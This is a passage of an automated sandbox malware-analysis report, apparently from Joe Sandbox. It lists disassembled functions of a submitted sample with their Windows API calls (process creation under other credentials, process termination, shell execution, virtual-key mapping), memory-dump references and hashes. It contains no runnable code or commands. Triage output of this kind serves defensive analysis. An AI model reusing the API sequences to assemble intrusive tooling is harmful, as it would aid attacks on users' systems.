                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: c69a28e985f5db0898e23b508874ea1907db51e2eaa65cd096a3777deaf84683
                                                  • Instruction ID: eab9e897703136e05e405847b3cd5d81096a6c74318ebcd65bbf4c1f9453224a
                                                  • Opcode Fuzzy Hash: c69a28e985f5db0898e23b508874ea1907db51e2eaa65cd096a3777deaf84683
                                                  • Instruction Fuzzy Hash: 4011BE31902A09FFDB24AFA4CC4ABBF7BAAFF41365F104018F54597210C73AA945DB64
                                                  Function 005F14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005F14FF
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 005F1506
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005F1515
                                                  • CloseHandle.KERNEL32(00000004), ref: 005F1520
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005F154F
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 005F1563
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 5e396a1ee5ed0c7809967e30958c1640f87c3eef65e02ea01976082d1ca30cd8
                                                  • Instruction ID: 8b9e0411d0f647788b3dcbf18eaab4e22aa003ed460d5c8336cd78bae38ffe3d
                                                  • Opcode Fuzzy Hash: 5e396a1ee5ed0c7809967e30958c1640f87c3eef65e02ea01976082d1ca30cd8
                                                  • Instruction Fuzzy Hash: AC11177250064EEBDF218F98DD49FEE7BAAFF48754F144015FA05A2060C3768E619B64
                                                  Function 005B3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,005B3379,005B2FE5), ref: 005B3390
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005B339E
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B33B7
                                                  • SetLastError.KERNEL32(00000000,?,005B3379,005B2FE5), ref: 005B3409
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 3a7a7ebc85008161fde33e1f77f9219036ae67c286021a98396d17b1d27a0955
                                                  • Instruction ID: 83ad5fe37c47cec18d292c90c13c2680c31730b64a76d39723be78a3a845d81e
                                                  • Opcode Fuzzy Hash: 3a7a7ebc85008161fde33e1f77f9219036ae67c286021a98396d17b1d27a0955
                                                  • Instruction Fuzzy Hash: 18014C33208712BEEB242774BC9A6E72F95FB45376B300629F410A11F0EF127D01D544
                                                  Function 005C2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,005C5686,005D3CD6,?,00000000,?,005C5B6A,?,?,?,?,?,005BE6D1,?,00658A48), ref: 005C2D78
                                                  • _free.LIBCMT ref: 005C2DAB
                                                  • _free.LIBCMT ref: 005C2DD3
                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,005BE6D1,?,00658A48,00000010,00594F4A,?,?,00000000,005D3CD6), ref: 005C2DE0
                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,005BE6D1,?,00658A48,00000010,00594F4A,?,?,00000000,005D3CD6), ref: 005C2DEC
                                                  • _abort.LIBCMT ref: 005C2DF2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: 6be51fac5b911fdf749bbccc773f0ca81ccfb14e75b2777742c8a831f6643f5e
                                                  • Instruction ID: c42b9db31c6ec68c5947cffb917e7b73e512c84b3dcf141d444b02a1b3817bd8
                                                  • Opcode Fuzzy Hash: 6be51fac5b911fdf749bbccc773f0ca81ccfb14e75b2777742c8a831f6643f5e
                                                  • Instruction Fuzzy Hash: B3F08635504B026FD72267F86C0AF5E1D5A7BD1771F25451CF426921D1DE3488035160
                                                  Function 00628A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
                                                    • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96A2
                                                    • Part of subcall function 005A9639: BeginPath.GDI32(?), ref: 005A96B9
                                                    • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96E2
                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00628A4E
                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00628A62
                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00628A70
                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00628A80
                                                  • EndPath.GDI32(?), ref: 00628A90
                                                  • StrokePath.GDI32(?), ref: 00628AA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: 4594498761b2de6d0860dd8b4050aae56c3f4d4442c2a76c178c4e44f8703f80
                                                  • Instruction ID: ba1638d92a61f278db07272e770d8e4b5c06b00d9dc9133c8dbf13784ad74fd3
                                                  • Opcode Fuzzy Hash: 4594498761b2de6d0860dd8b4050aae56c3f4d4442c2a76c178c4e44f8703f80
                                                  • Instruction Fuzzy Hash: F1110C7600051DFFEF129F94DC48E9A7F6EEB08364F048011FA159A1A1C7729D55DFA0
                                                  Function 005F51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 005F5218
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 005F5229
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005F5230
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 005F5238
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 005F524F
                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 005F5261
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: 029268a5651a19a34a60b6105ac66329714f70c3c221ba8e0bfc1b14056ad2ab
                                                  • Instruction ID: fb59b37984326cc04ee461136850aa8c2b6f84a4dc7e381fce719b713863666e
                                                  • Opcode Fuzzy Hash: 029268a5651a19a34a60b6105ac66329714f70c3c221ba8e0bfc1b14056ad2ab
                                                  • Instruction Fuzzy Hash: 67018F75E00B08BBEB109BA69C49E5EBFB9FF48761F044165FB04A7281D6709801CBA0
                                                  Function 00591BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00591BF4
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00591BFC
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00591C07
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00591C12
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00591C1A
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00591C22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: 54bc562b02620e6042f95feab3ab5209894c256b521af19b7f4d4a8e2cf9f681
                                                  • Instruction ID: 15126523f194e4ad346360752e03927d955e0d609b1171b3dbf4257a0ceefe5e
                                                  • Opcode Fuzzy Hash: 54bc562b02620e6042f95feab3ab5209894c256b521af19b7f4d4a8e2cf9f681
                                                  • Instruction Fuzzy Hash: 180167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                  Function 005FEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005FEB30
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005FEB46
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 005FEB55
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB64
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB6E
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 628290074e15895b4b632c84f476d5d454d9be77fbce034cd9b3090af99e21af
                                                  • Instruction ID: fee45d6bde68b1e8536950a21601b57507979bed10880e101b47155f411d53a7
                                                  • Opcode Fuzzy Hash: 628290074e15895b4b632c84f476d5d454d9be77fbce034cd9b3090af99e21af
                                                  • Instruction Fuzzy Hash: 4FF05E72240D59BBE7315B629C0EEEF3E7EEFCAB21F005158F601D1091D7A45A02C6B5
                                                  Function 005E7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClientRect.USER32(?), ref: 005E7452
                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 005E7469
                                                  • GetWindowDC.USER32(?), ref: 005E7475
                                                  • GetPixel.GDI32(00000000,?,?), ref: 005E7484
                                                  • ReleaseDC.USER32(?,00000000), ref: 005E7496
                                                  • GetSysColor.USER32(00000005), ref: 005E74B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                  • String ID:
                                                  • API String ID: 272304278-0
                                                  • Opcode ID: 50469b109ffaa88e7f5e4e90edee8ea14e9f5b51d5e681e703ed4104c377fd85
                                                  • Instruction ID: e2e767d6021d7866dbccf60af4b0b2b4d063c518757134095a354ae6f5ce59c5
                                                  • Opcode Fuzzy Hash: 50469b109ffaa88e7f5e4e90edee8ea14e9f5b51d5e681e703ed4104c377fd85
                                                  • Instruction Fuzzy Hash: 95018631400A19EFEB215FA4DC08BAE7FB6FF08321F201460F916A21A0CB311E62AB50
                                                  Function 005F1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005F187F
                                                  • UnloadUserProfile.USERENV(?,?), ref: 005F188B
                                                  • CloseHandle.KERNEL32(?), ref: 005F1894
                                                  • CloseHandle.KERNEL32(?), ref: 005F189C
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 005F18A5
                                                  • HeapFree.KERNEL32(00000000), ref: 005F18AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: 9065f2aeb31803b729148465938fa81642bb180d5e16ef7dddff1b9b195b0b6e
                                                  • Instruction ID: 0431e543f85b82eda4bfad23fc82bcc1ac9a74d053534609f3441caf101792f1
                                                  • Opcode Fuzzy Hash: 9065f2aeb31803b729148465938fa81642bb180d5e16ef7dddff1b9b195b0b6e
                                                  • Instruction Fuzzy Hash: 6CE0C236004D02BBDB115BA1ED0D90ABB2AFF49B32B209620F22585074CB329432EB50
                                                  Function 0059BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0059BEB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer
                                                  • String ID: D%f$D%f$D%f$D%fD%f
                                                  • API String ID: 1385522511-2841713072
                                                  • Opcode ID: 9587ee904dae7ea3f7e10ab2bc759b617e8ac2a6dce1aa95bc4974f3ab5382f0
                                                  • Instruction ID: 6ba8c19ac665433aa35d6aeff3a06a35d80601bfe0c7372d0f75fdb0593f7147
                                                  • Opcode Fuzzy Hash: 9587ee904dae7ea3f7e10ab2bc759b617e8ac2a6dce1aa95bc4974f3ab5382f0
                                                  • Instruction Fuzzy Hash: D8915C75A0060ACFEF18CF58D1906AABBF2FF58310F24856AD946AB351D771ED81CB90
                                                  Function 00617B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005B0242: EnterCriticalSection.KERNEL32(0066070C,00661884,?,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B024D
                                                    • Part of subcall function 005B0242: LeaveCriticalSection.KERNEL32(0066070C,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B028A
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
                                                  • __Init_thread_footer.LIBCMT ref: 00617BFB
                                                    • Part of subcall function 005B01F8: EnterCriticalSection.KERNEL32(0066070C,?,?,005A8747,00662514), ref: 005B0202
                                                    • Part of subcall function 005B01F8: LeaveCriticalSection.KERNEL32(0066070C,?,005A8747,00662514), ref: 005B0235
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                  • String ID: +T^$5$G$Variable must be of type 'Object'.
                                                  • API String ID: 535116098-1904898098
                                                  • Opcode ID: 35eaa0833f7c81004821b1c940427f9cbe801a90f1f5722238d52a1040324f86
                                                  • Instruction ID: 3123abcdf55686ea18176f1698a21e8e53698455d087fd8dc15fe0eb6920036c
                                                  • Opcode Fuzzy Hash: 35eaa0833f7c81004821b1c940427f9cbe801a90f1f5722238d52a1040324f86
                                                  • Instruction Fuzzy Hash: 84916D74A04209EFCB14EF94D8959EDBBB2FF89304F188059F8069B391DB71AE85CB51
                                                  Function 005FC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FC6EE
                                                  • _wcslen.LIBCMT ref: 005FC735
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FC79C
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005FC7CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                  • String ID: 0
                                                  • API String ID: 1227352736-4108050209
                                                  • Opcode ID: 287f3ebdb74a203418bb60cb7b70eea27fc18337dafc33dae1f3639ad9381e19
                                                  • Instruction ID: b6050d70eaa508d202d19e4c53ee8c5bff826df00d63f016dd51e30679a052da
                                                  • Opcode Fuzzy Hash: 287f3ebdb74a203418bb60cb7b70eea27fc18337dafc33dae1f3639ad9381e19
                                                  • Instruction Fuzzy Hash: A451CF7160930D9BD714AF28CA49A7B7FE8FF85314F040A3DFA95D6190DB68D904CB92
                                                  Function 0061AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0061AEA3
                                                    • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
                                                  • GetProcessId.KERNEL32(00000000), ref: 0061AF38
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061AF67
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
